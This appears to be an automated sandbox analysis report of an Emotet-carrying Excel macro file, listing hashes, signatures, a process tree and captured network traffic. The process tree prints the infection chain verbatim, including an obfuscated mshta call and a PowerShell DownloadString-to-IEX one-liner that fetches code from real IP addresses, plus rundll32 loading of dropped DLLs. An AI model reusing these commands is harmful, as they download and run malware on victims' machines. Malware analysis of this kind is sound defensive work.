Analysis
max time kernel: 149s
max time network: 147s
platform: windows7_x64
resource: win7-en-20211208
submitted: 20-01-2022 13:00
Behavioral task
behavioral1
Sample
92f01f34d0d3d902538fa84268d937ddcbfb4e40234b4a97b1b50a227a002f1a.xlsm
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
92f01f34d0d3d902538fa84268d937ddcbfb4e40234b4a97b1b50a227a002f1a.xlsm
Resource
win10v2004-en-20220113
General
Target: 92f01f34d0d3d902538fa84268d937ddcbfb4e40234b4a97b1b50a227a002f1a.xlsm
Size: 115KB
MD5: 12f7a6aa0a09e355bd70c8291ae682e2
SHA1: ea7943806f839e871bb5c957d64850ca66118577
SHA256: 92f01f34d0d3d902538fa84268d937ddcbfb4e40234b4a97b1b50a227a002f1a
SHA512: df6ee800f9bf4b2e9a60b8a371031410416992b4b1806900fdfc4d399e5c5cdf5efc53d62ce3f8549bdbe3e88e20f4c4cf6662d8b826d4c0cb082a53d0afb2a4
Malware Config
Extracted
http://0x5cff39c3/sec/se1.html
Extracted
http://92.255.57.195/sec/se1.png
Extracted
emotet
Epoch5
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description | pid | pid_target | Process | procid_target
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process | 640 | 1108 | cmd.exe | 26
-
suricata: ET MALWARE W32/Emotet CnC Beacon 3
-
Blocklisted process makes network request 8 IoCs
flow | pid | Process
4 | 836 | mshta.exe
5 | 1744 | powershell.exe
7 | 1744 | powershell.exe
9 | 1744 | powershell.exe
11 | 1952 | rundll32.exe
12 | 1952 | rundll32.exe
13 | 1952 | rundll32.exe
15 | 1952 | rundll32.exe
-
Downloads MZ/PE file
-
Loads dropped DLL 8 IoCs
pid | Process
1740 | rundll32.exe
1740 | rundll32.exe
1740 | rundll32.exe
1740 | rundll32.exe
1168 | rundll32.exe
1168 | rundll32.exe
1168 | rundll32.exe
1168 | rundll32.exe
-
Drops file in System32 directory 1 IoCs
description | ioc | Process
File opened for modification | C:\Windows\SysWOW64\Wagne\xhjatsq.oce | rundll32.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Enumerates system info in registry 2 TTPs 1 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | EXCEL.EXE
-
Modifies registry class 64 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid | Process
1108 | EXCEL.EXE
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid | Process
1744 | powershell.exe
1952 | rundll32.exe
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
description | pid | Process
Token: SeDebugPrivilege | 1744 | powershell.exe
-
Suspicious use of SetWindowsHookEx 7 IoCs
pid | Process
1108 | EXCEL.EXE
1108 | EXCEL.EXE
1108 | EXCEL.EXE
1108 | EXCEL.EXE
1108 | EXCEL.EXE
1108 | EXCEL.EXE
1108 | EXCEL.EXE
-
Suspicious use of WriteProcessMemory 48 IoCs
description | pid | Process | procid_target
PID 1108 wrote to memory of 1492 | 1108 | EXCEL.EXE | 27
PID 1108 wrote to memory of 1492 | 1108 | EXCEL.EXE | 27
PID 1108 wrote to memory of 1492 | 1108 | EXCEL.EXE | 27
PID 1108 wrote to memory of 1492 | 1108 | EXCEL.EXE | 27
PID 1108 wrote to memory of 640 | 1108 | EXCEL.EXE | 28
PID 1108 wrote to memory of 640 | 1108 | EXCEL.EXE | 28
PID 1108 wrote to memory of 640 | 1108 | EXCEL.EXE | 28
PID 1108 wrote to memory of 640 | 1108 | EXCEL.EXE | 28
PID 640 wrote to memory of 836 | 640 | cmd.exe | 30
PID 640 wrote to memory of 836 | 640 | cmd.exe | 30
PID 640 wrote to memory of 836 | 640 | cmd.exe | 30
PID 640 wrote to memory of 836 | 640 | cmd.exe | 30
PID 836 wrote to memory of 1744 | 836 | mshta.exe | 34
PID 836 wrote to memory of 1744 | 836 | mshta.exe | 34
PID 836 wrote to memory of 1744 | 836 | mshta.exe | 34
PID 836 wrote to memory of 1744 | 836 | mshta.exe | 34
PID 1744 wrote to memory of 1544 | 1744 | powershell.exe | 36
PID 1744 wrote to memory of 1544 | 1744 | powershell.exe | 36
PID 1744 wrote to memory of 1544 | 1744 | powershell.exe | 36
PID 1744 wrote to memory of 1544 | 1744 | powershell.exe | 36
PID 1544 wrote to memory of 1740 | 1544 | cmd.exe | 37
PID 1544 wrote to memory of 1740 | 1544 | cmd.exe | 37
PID 1544 wrote to memory of 1740 | 1544 | cmd.exe | 37
PID 1544 wrote to memory of 1740 | 1544 | cmd.exe | 37
PID 1544 wrote to memory of 1740 | 1544 | cmd.exe | 37
PID 1544 wrote to memory of 1740 | 1544 | cmd.exe | 37
PID 1544 wrote to memory of 1740 | 1544 | cmd.exe | 37
PID 1740 wrote to memory of 1168 | 1740 | rundll32.exe | 38
PID 1740 wrote to memory of 1168 | 1740 | rundll32.exe | 38
PID 1740 wrote to memory of 1168 | 1740 | rundll32.exe | 38
PID 1740 wrote to memory of 1168 | 1740 | rundll32.exe | 38
PID 1740 wrote to memory of 1168 | 1740 | rundll32.exe | 38
PID 1740 wrote to memory of 1168 | 1740 | rundll32.exe | 38
PID 1740 wrote to memory of 1168 | 1740 | rundll32.exe | 38
PID 1168 wrote to memory of 1696 | 1168 | rundll32.exe | 39
PID 1168 wrote to memory of 1696 | 1168 | rundll32.exe | 39
PID 1168 wrote to memory of 1696 | 1168 | rundll32.exe | 39
PID 1168 wrote to memory of 1696 | 1168 | rundll32.exe | 39
PID 1168 wrote to memory of 1696 | 1168 | rundll32.exe | 39
PID 1168 wrote to memory of 1696 | 1168 | rundll32.exe | 39
PID 1168 wrote to memory of 1696 | 1168 | rundll32.exe | 39
PID 1696 wrote to memory of 1952 | 1696 | rundll32.exe | 40
PID 1696 wrote to memory of 1952 | 1696 | rundll32.exe | 40
PID 1696 wrote to memory of 1952 | 1696 | rundll32.exe | 40
PID 1696 wrote to memory of 1952 | 1696 | rundll32.exe | 40
PID 1696 wrote to memory of 1952 | 1696 | rundll32.exe | 40
PID 1696 wrote to memory of 1952 | 1696 | rundll32.exe | 40
PID 1696 wrote to memory of 1952 | 1696 | rundll32.exe | 40
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\92f01f34d0d3d902538fa84268d937ddcbfb4e40234b4a97b1b50a227a002f1a.xlsm
Tree depth: 1
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1108
-
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
Tree depth: 2
PID:1492
-
C:\Windows\SysWOW64\cmd.exe
cmd /c m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/se1.html
Tree depth: 2
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:640
-
C:\Windows\SysWOW64\mshta.exe
mshta http://0x5cff39c3/sec/se1.html
Tree depth: 3
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:836
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://92.255.57.195/sec/se1.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Tree depth: 4
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1744
-
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
Tree depth: 5
- Suspicious use of WriteProcessMemory
PID:1544
-
C:\Windows\SysWow64\rundll32.exe
C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
Tree depth: 6
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1740
-
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
Tree depth: 7
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:1168
-
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wagne\xhjatsq.oce",jkYS
Tree depth: 8
- Suspicious use of WriteProcessMemory
PID:1696
-
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wagne\xhjatsq.oce",DllRegisterServer
Tree depth: 9
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:1952
Network
-
Remote address: 92.255.57.195:80
Request
GET /sec/se1.html HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: 92.255.57.195
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Wed, 19 Jan 2022 18:29:09 GMT
ETag: "2adf-5d5f38fbf4740"
Accept-Ranges: bytes
Content-Length: 10975
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
-
Remote address: 92.255.57.195:80
Request
GET /sec/se1.png HTTP/1.1
Host: 92.255.57.195
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Wed, 19 Jan 2022 18:27:22 GMT
ETag: "430-5d5f3895e9680"
Accept-Ranges: bytes
Content-Length: 1072
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/png
-
Remote address: 8.8.8.8:53
Request
seven-lines.com IN A
Response
seven-lines.com IN A 178.208.83.22
-
Remote address: 8.8.8.8:53
Request
seven-lines.com IN A
Response
seven-lines.com IN A 178.208.83.22
-
Remote address: 178.208.83.22:80
Request
GET /wp-includes/QEGNF4XUSR2Ps/ HTTP/1.1
Host: seven-lines.com
Connection: Keep-Alive
Response
HTTP/1.1 404 Not Found
Date: Thu, 20 Jan 2022 13:00:41 GMT
Content-Type: text/html
Content-Length: 1390
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
ETag: "5a4b7cd2-56e"
-
Remote address: 8.8.8.8:53
Request
quranthemepark.com IN A
Response
quranthemepark.com IN A 104.21.59.15
quranthemepark.com IN A 172.67.167.147
-
Remote address: 104.21.59.15:80
Request
GET /wp-content/OaIz2gBtm/ HTTP/1.1
Host: quranthemepark.com
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 573440
Connection: keep-alive
x-powered-by: PHP/7.4.26
set-cookie: 61e95cfa6871d=1642683642; expires=Thu, 20-Jan-2022 13:01:42 GMT; Max-Age=60; path=/
cache-control: no-cache, must-revalidate
pragma: no-cache
last-modified: Thu, 20 Jan 2022 13:00:42 GMT
expires: Thu, 20 Jan 2022 13:00:42 GMT
content-disposition: attachment; filename="Mnn5aTw4cbQfa.dll"
content-transfer-encoding: binary
x-turbo-charged-by: LiteSpeed
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=f9paFLKTegeP5IDk2NxxNSU15mFgeI%2BSkYNERxLmZWMhC3sklK8E8%2FrgJ5hTqbw0MCTSvhDVR11FTDqfwtHaK3FUQyrwQok6i0ErQn1BpvRmqZyUoBrCCpnAsBCX6EweaEiHOCU%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6d087cbcfe261ed6-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
-
Remote address: 69.16.218.101:8080
Request
GET /LHyFjvUSshgKZWdsKtuzciSGqqTgxPjUzJDwjkN HTTP/1.1
Cookie: YiLPOtLipOUi=69ndAlY7nJX7O7X28fOPnpLakAWbOBrRvH9Fxu1XphOKCEJhfpCFBMAjStZIqQEYEV1DNK+VsVSFwB9+PPMrGgd0jpNpAVDnW9+ntx0R9iZARURcfcsgdNPVA9eH1vILlrOUSKzlQt9ziLvdxNN7E+4Q/wyb5/F7f4K9GPRCD5koPhSIzxpYL7srrUqaMNgNiTWesm8XdLaMZ1J/LzDz+gK9BQzPow7y0ZaOADzQEfecUvz+DTLUdxgLUtaz3kXtMWK8Tk1UqCg/w4GVgnL7j1oD1JGZNP/7jKNOP2NmKNxxNzI=
Host: 69.16.218.101:8080
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Date: Thu, 20 Jan 2022 13:00:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
716 B 11.7kB 8 10
HTTP Request
GET http://92.255.57.195/sec/se1.html
HTTP Response
200
-
678 B 3.0kB 13 5
HTTP Request
GET http://92.255.57.195/sec/se1.png
HTTP Response
200
-
643 B 1.8kB 12 5
HTTP Request
GET http://seven-lines.com/wp-includes/QEGNF4XUSR2Ps/
HTTP Response
404
-
9.8kB 591.0kB 211 414
HTTP Request
GET http://quranthemepark.com/wp-content/OaIz2gBtm/
HTTP Response
200
-
152 B 120 B 3 3
-
152 B 120 B 3 3
-
69.16.218.101:8080
https://69.16.218.101:8080/LHyFjvUSshgKZWdsKtuzciSGqqTgxPjUzJDwjkN
tls, http
rundll32.exe
1.2kB 3.0kB 8 9
HTTP Request
GET https://69.16.218.101:8080/LHyFjvUSshgKZWdsKtuzciSGqqTgxPjUzJDwjkN
HTTP Response
200
-
122 B 154 B 2 2
DNS Request
seven-lines.com
DNS Request
seven-lines.com
DNS Response
178.208.83.22
DNS Response
178.208.83.22
-
64 B 96 B 1 1
DNS Request
quranthemepark.com
DNS Response
104.21.59.15
172.67.167.147